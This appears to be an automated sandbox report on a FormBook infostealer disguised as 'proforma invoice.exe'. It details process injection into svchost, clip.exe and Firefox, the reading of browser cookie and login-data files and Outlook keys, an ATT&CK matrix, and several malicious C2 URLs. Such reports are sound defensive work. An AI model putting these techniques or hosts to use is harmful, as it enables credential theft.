            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\proforma invoice.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\clip.exeThread register set: target process: 8032Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\clip.exeThread APC queued: target process: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\proforma invoice.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 268E008Jump to behavior
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00B01201
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AE2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00AE2BA5
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B0B226 SendInput,keybd_event,0_2_00B0B226
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B222DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00B222DA
            Source: C:\Users\user\Desktop\proforma invoice.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\proforma invoice.exe"Jump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00B00B62
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B01663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00B01663
            Source: proforma invoice.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: proforma invoice.exe, NpiZrjTdIDFUidJcY.exe, 00000002.00000000.1775638132.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000002.00000002.4103793814.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000000.1920393298.0000000001210000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: NpiZrjTdIDFUidJcY.exe, 00000002.00000000.1775638132.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000002.00000002.4103793814.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000000.1920393298.0000000001210000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: NpiZrjTdIDFUidJcY.exe, 00000002.00000000.1775638132.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000002.00000002.4103793814.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000000.1920393298.0000000001210000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: NpiZrjTdIDFUidJcY.exe, 00000002.00000000.1775638132.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000002.00000002.4103793814.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000000.1920393298.0000000001210000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AC0698 cpuid 0_2_00AC0698
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B18195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00B18195
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AFD27A GetUserNameW,0_2_00AFD27A
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00ADBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00ADBB6F
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA42DE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4103118117.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849019364.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4103939789.0000000004CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849710409.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4103994026.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4104123201.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849745711.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: proforma invoice.exeBinary or memory string: WIN_81
            Source: proforma invoice.exeBinary or memory string: WIN_XP
            Source: proforma invoice.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: proforma invoice.exeBinary or memory string: WIN_XPe
            Source: proforma invoice.exeBinary or memory string: WIN_VISTA
            Source: proforma invoice.exeBinary or memory string: WIN_7
            Source: proforma invoice.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4103118117.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849019364.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4103939789.0000000004CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849710409.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4103994026.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4104123201.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849745711.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B21204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00B21204
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B21806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00B21806

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials12
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1497807 Sample: proforma invoice.exe Startdate: 23/08/2024 Architecture: WINDOWS Score: 100 28 www.xn--matfrmn-jxa4m.se 2->28 30 www.xn--fhq1c541j0zr.com 2->30 32 13 other IPs or domains 2->32 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 9 other signatures 2->48 10 proforma invoice.exe 4 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 NpiZrjTdIDFUidJcY.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 clip.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 NpiZrjTdIDFUidJcY.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.anuts.top 23.251.54.212, 49754, 49755, 49756 VPSQUANUS United States 22->34 36 parkingpage.namecheap.com 91.195.240.19, 49766, 49767, 49768 SEDO-ASDE Germany 22->36 38 8 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            proforma invoice.exe29%ReversingLabs
            proforma invoice.exe29%VirustotalBrowse
            proforma invoice.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.sandranoll.com11%VirustotalBrowse
            www.dmtxwuatbz.cc2%VirustotalBrowse
            www.xn--matfrmn-jxa4m.se0%VirustotalBrowse
            www.catherineviskadi.com1%VirustotalBrowse
            www.anuts.top7%VirustotalBrowse
            www.telwisey.info2%VirustotalBrowse
            www.bfiworkerscomp.com0%VirustotalBrowse
            www.hatercoin.online2%VirustotalBrowse
            www.gipsytroya.com8%VirustotalBrowse
            www.xn--fhq1c541j0zr.com0%VirustotalBrowse
            parkingpage.namecheap.com0%VirustotalBrowse
            www.helpers-lion.online0%VirustotalBrowse
            www.hprlz.cz1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/pics/29590/bg1.png)0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://dts.gnpge.com0%Avira URL Cloudsafe
            https://cdn.consentmanager.net0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff20%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/pics/29590/bg1.png)0%VirustotalBrowse
            http://www.xn--fhq1c541j0zr.com/rm91/0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css0%VirustotalBrowse
            https://dts.gnpge.com0%VirustotalBrowse
            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff20%VirustotalBrowse
            http://www.bfiworkerscomp.com/xzzi/0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix0%VirustotalBrowse
            https://static.loopia.se/responsive/images/iOS-72.png0%Avira URL Cloudsafe
            https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            http://www.xn--fhq1c541j0zr.com/rm91/0%VirustotalBrowse
            http://www.domaintechnik.at/data/gfx/dt_logo_parking.png0%Avira URL Cloudsafe
            https://cdn.consentmanager.net0%VirustotalBrowse
            http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-72.png0%VirustotalBrowse
            https://static.loopia.se/shared/logo/logo-loopia-white.svg0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%VirustotalBrowse
            https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg0%VirustotalBrowse
            https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking1%VirustotalBrowse
            http://www.bfiworkerscomp.com/xzzi/0%VirustotalBrowse
            http://www.domaintechnik.at/data/gfx/dt_logo_parking.png0%VirustotalBrowse
            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%VirustotalBrowse
            https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe1%VirustotalBrowse
            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf0%Avira URL Cloudsafe
            https://static.loopia.se/shared/logo/logo-loopia-white.svg0%VirustotalBrowse
            https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw0%Avira URL Cloudsafe
            https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf0%VirustotalBrowse
            https://www.domaintechnik.at/fileadmin/gfx/icons/free-basic-hosting.png0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf0%Avira URL Cloudsafe
            http://www.dmtxwuatbz.cc/lfkn/0%Avira URL Cloudsafe
            https://www.domaintechnik.at/fileadmin/gfx/icons/partner.jpg0%Avira URL Cloudsafe
            https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw1%VirustotalBrowse
            http://i1.cdn-image.com/__media__/pics/28903/search.png)0%Avira URL Cloudsafe
            https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%VirustotalBrowse
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            https://www.domaintechnik.at/fileadmin/gfx/icons/free-basic-hosting.png0%VirustotalBrowse
            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf0%VirustotalBrowse
            https://www.domaintechnik.at/fileadmin/gfx/icons/partner.jpg0%VirustotalBrowse
            http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%VirustotalBrowse
            http://www.sandranoll.com/aroo/100%Avira URL Cloudmalware
            http://i1.cdn-image.com/__media__/pics/28903/search.png)0%VirustotalBrowse
            http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.com0%Avira URL Cloudsafe
            https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%Avira URL Cloudsafe
            https://delivery.consentmanager.net0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)0%VirustotalBrowse
            https://static.loopia.se/shared/style/2022-extra-pages.css0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold0%VirustotalBrowse
            http://www.gipsytroya.com/tf44/100%Avira URL Cloudmalware
            http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.com0%VirustotalBrowse
            https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%VirustotalBrowse
            http://www.xn--matfrmn-jxa4m.se/4hda/100%Avira URL Cloudmalware
            https://delivery.consentmanager.net0%VirustotalBrowse
            http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-114.png0%Avira URL Cloudsafe
            https://static.loopia.se/shared/style/2022-extra-pages.css0%VirustotalBrowse
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%VirustotalBrowse
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.xn--matfrmn-jxa4m.se/4hda/0%VirustotalBrowse
            http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg0%VirustotalBrowse
            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot0%Avira URL Cloudsafe
            http://www.gipsytroya.com/tf44/7%VirustotalBrowse
            http://www.telwisey.info/ei85/0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/Financial_Services.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%20%Avira URL Cloudsafe
            https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-114.png0%VirustotalBrowse
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/Resume_Search.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2BtVzp0%Avira URL Cloudsafe
            http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            https://static.loopia.se/responsive/styles/reset.css0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff20%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js0%Avira URL Cloudsafe
            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff0%Avira URL Cloudsafe
